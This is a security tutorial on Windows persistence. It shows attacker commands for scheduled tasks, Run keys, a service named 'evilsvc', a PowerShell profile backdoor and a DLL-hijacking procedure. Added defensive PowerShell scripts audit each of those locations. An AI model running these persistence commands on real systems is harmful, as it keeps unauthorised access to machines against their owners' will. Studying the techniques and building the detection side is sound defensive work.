Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me!

Scheduled Task

We can create a scheduled task that executes a specified binary or command. For example, if we want to execute UpdateMessenger.exe every two hours, we can use the methods below.

Native Windows Command

Upload your backdoor and run the following command:

schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM"

Using SharPersist

.\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

Download SharPersist.

Registry Persistence

By modifying a registry key, an attacker can start a specified binary at startup.

Native Windows Command

For the currently compromised user:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"

If you have SYSTEM (or administrator) access:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"

Using SharPersist

.\SharPersist.exe -t reg -c "C:\Windows\Tasks\legit.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

Here -k selects the Run key to write to (hkcurun for the HKCU Run key, hklmrun for the HKLM one) and -v is the value name that will hold the command.

As a result, whenever the compromised system reboots and the user logs on again, the attacker gets reconnected.

Backdoor as a Service

If we create a service, we can execute our backdoor as a service.

Native Windows Command

sc create evilsvc binpath= "C:\Windows\Tasks\legit.exe" start= "auto" obj= "LocalSystem"

Using SharPersist

.\SharPersist.exe -t service -c "C:\Windows\Tasks\legit.exe" -n "Legit Service" -m add
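The three autostart locations above (scheduled tasks, Run keys, services) are also the first places a defender looks. The script below is an added example, not part of the original notes and not SharPersist code: it enumerates all three and flags every entry whose executable lives outside the OS and vendor directories (C:\Windows\Tasks, %TEMP%, a user profile, and so on). It assumes Windows PowerShell 5.1 or later, run elevated so that HKLM, every loaded user hive and every task are readable; the $TrustedRoots list is an assumed starting point to tune per environment.

```powershell
# Added example (not from the original notes or from SharPersist): audit the
# scheduled tasks, Run/RunOnce keys and services on this host and report
# entries whose binary sits outside the usual OS/vendor directories.
# Assumptions: Windows PowerShell 5.1+, run elevated; $TrustedRoots is a
# starting point, not a complete allow list.

$TrustedRoots = @("$env:SystemRoot\System32\", "$env:SystemRoot\SysWOW64\",
                  "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")

function Get-ExecutablePath {
    # Reduce a command line to its executable: handles "quoted paths",
    # environment variables, and unquoted paths that contain spaces.
    param([string]$CommandLine)
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($expanded -match '^"([^"]+)"') { return $Matches[1] }
    $tokens = $expanded -split '\s+'
    for ($i = 1; $i -le $tokens.Count; $i++) {
        # Grow the candidate one token at a time until it names a real file
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf -ErrorAction SilentlyContinue) { return $candidate }
    }
    return $tokens[0]
}

function Test-TrustedPath {
    param([string]$Path)
    foreach ($root in $TrustedRoots) {
        if ($Path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Get-AutostartFindings {
    $findings = @()

    # 1. Scheduled tasks (schtasks /create, SharPersist -t schtask*)
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }      # COM-handler actions have no Execute
            $exe = Get-ExecutablePath $action.Execute
            if (-not (Test-TrustedPath $exe)) {
                $findings += [pscustomobject]@{ Source = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; RunAs = $task.Principal.UserId; Binary = $exe }
            }
        }
    }

    # 2. Run / RunOnce keys: machine-wide plus every loaded user hive (REG ADD, SharPersist -t reg)
    $runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run')
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $userHives = Get-ChildItem HKU:\ | Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notlike '*_Classes' }
    foreach ($hive in $userHives) {
        $runKeys += "HKU:\$($hive.PSChildName)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $runKeys += "HKU:\$($hive.PSChildName)\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    }
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }       # skip PSPath, PSParentPath, ... metadata
            $exe = Get-ExecutablePath ([string]$p.Value)
            if (-not (Test-TrustedPath $exe)) {
                $findings += [pscustomobject]@{ Source = 'RunKey'; Name = "$key\$($p.Name)"; RunAs = ''; Binary = $exe }
            }
        }
    }

    # 3. Services (sc create, SharPersist -t service)
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ExecutablePath $svc.PathName
        if (-not (Test-TrustedPath $exe)) {
            $findings += [pscustomobject]@{ Source = 'Service'; Name = $svc.Name; RunAs = $svc.StartName; Binary = $exe }
        }
    }
    return $findings
}

Get-AutostartFindings | Sort-Object Source, Name | Format-Table -AutoSize
```

Every command on this page would show up in that table: the UpdateMessenger task running as SYSTEM, the "Legit Service" Run value, and evilsvc, all pointing at C:\Windows\Tasks. Run it once on a clean build to baseline the legitimate entries, then diff later runs against that baseline rather than reading the full list each time.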

PowerShell Profile

Whenever the compromised user starts PowerShell, our backdoor also gets executed!

  1. Create a file called profile.ps1 in %HOMEPATH%\Documents\WindowsPowerShell
  2. Store the command to be executed in it:

echo "c:\Windows\Tasks\legit.exe" > %HOMEPATH%\Documents\WindowsPowerShell\profile.ps1
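Because profile.ps1 is loaded silently, the defensive counterpart is simply knowing which profile scripts exist and what they contain. The function below is an added example, not part of the original notes: it reports all four profile locations the current host would load, with owner, hash and the first statement of each. It assumes you run it from the host you are auditing (Windows PowerShell and PowerShell 7 keep separate profile directories, so run it in each).

```powershell
# Added example (not from the original notes): list every profile script the
# current PowerShell host would load, so an unexpected profile.ps1 under
# %HOMEPATH%\Documents\WindowsPowerShell stands out.
# Assumption: run from the host (Windows PowerShell or PowerShell 7) you want to audit.

function Get-ProfileReport {
    # $PROFILE carries the four profile locations as note properties
    $paths = @($PROFILE.AllUsersAllHosts, $PROFILE.AllUsersCurrentHost,
               $PROFILE.CurrentUserAllHosts, $PROFILE.CurrentUserCurrentHost)
    foreach ($path in $paths) {
        $report = [ordered]@{ Path = $path; Exists = $false; Modified = $null;
                              Owner = $null; SHA256 = $null; FirstStatement = $null }
        if (Test-Path -LiteralPath $path -PathType Leaf) {
            $item = Get-Item -LiteralPath $path
            $report.Exists   = $true
            $report.Modified = $item.LastWriteTime
            $report.Owner    = (Get-Acl -LiteralPath $path).Owner
            $report.SHA256   = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            # First non-blank, non-comment line: a quick hint of what the profile does
            $report.FirstStatement = Get-Content -LiteralPath $path |
                Where-Object { $_.Trim() -and $_ -notmatch '^\s*#' } |
                Select-Object -First 1
        }
        [pscustomobject]$report
    }
}

Get-ProfileReport | Format-List
```

A profile is an ordinary script, so the execution policy applies to it (Restricted or AllSigned refuses an unsigned profile.ps1), sessions started with -NoProfile skip it, and with Script Block Logging enabled its contents are recorded as event 4104 in Microsoft-Windows-PowerShell/Operational, which gives a second place to look for it.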

DLL Hijacking

When a new process starts, it searches a fixed set of locations for the libraries it needs.

DLL Search Order:

1. The Application Directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. Current Working Directory
6. Directories in %PATH% environment variable

How to Hijack?

  1. To hijack a DLL, we need to find which DLL is searched for but not found. We can use ProcMon, filtering on the application name and the "NAME NOT FOUND" result.
  2. Then, using icacls C:\TargetApp, we can verify whether the directory is writable.
  3. If the directory is writable, we build our malicious DLL, give it the same name as the legitimate DLL that is not found, and copy it to that directory.
  4. If everything is done correctly, we get a shell when the vulnerable application is executed again.

Note: WinPEAS can check whether DLL hijacking is possible.
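The precondition in step 2 above is the one a hardening review checks for: no directory in the search order should be writable by ordinary users. The script below is an added example, not part of the original notes or of WinPEAS: it walks the search order exactly as listed above and reports, for each directory, whether an Allow ACE for a group every interactive user belongs to grants write or create rights on the directory itself. $AppDir is a placeholder for the application directory under review, and the order is the default one (SafeDllSearchMode enabled) that the list above describes.

```powershell
# Added example (not from the original notes or from WinPEAS): report which
# directories in the default DLL search order can be written to by ordinary
# users, i.e. the condition step 2 (icacls) checks by hand.
# Assumptions: $AppDir is a placeholder for the application directory under
# review; the order below is the default SafeDllSearchMode order.

$AppDir = 'C:\TargetApp'   # placeholder, replace with the application directory under review

function Test-WritableByLowPriv {
    # True if an Allow ACE for a group that every interactive user belongs to
    # grants write/create rights on the directory itself (not only on children)
    param([string]$Directory)
    $broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE')
    # FileSystemRights.Write (0x116) covers CreateFiles/CreateDirectories/WriteAttributes;
    # 0x40000000 and 0x10000000 are GENERIC_WRITE and GENERIC_ALL, which Get-Acl
    # surfaces as raw numbers rather than enum names.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor 0x40000000 -bor 0x10000000
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }   # applies to children only
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-SearchOrderReport {
    param([string]$ApplicationDirectory)
    # 1-5: application directory, System32, System, Windows, current directory; 6: %PATH%
    $searchOrder = @($ApplicationDirectory, "$env:SystemRoot\System32", "$env:SystemRoot\System",
                     $env:SystemRoot, (Get-Location).ProviderPath)
    $searchOrder += @($env:Path -split ';' | Where-Object { $_.Trim() })
    $position = 0
    foreach ($dir in $searchOrder) {
        $position++
        $exists = Test-Path -LiteralPath $dir -PathType Container
        $writable = $false
        if ($exists) { $writable = Test-WritableByLowPriv $dir }
        [pscustomobject]@{ Order = $position; Directory = $dir; Exists = $exists; LowPrivWritable = $writable }
    }
}

Get-SearchOrderReport -ApplicationDirectory $AppDir | Format-Table -AutoSize
```

Any row with LowPrivWritable = True is an ACL to fix, and the lower its Order the more it matters. Two caveats on the order itself: DLLs listed under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs are always taken from System32 regardless of this search, and an application can alter the order for itself with LoadLibraryEx flags or SetDefaultDllDirectories, so the ProcMon trace from step 1 remains the authoritative source for what a given program actually searched.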

Other interesting methods will be noted here as they are added!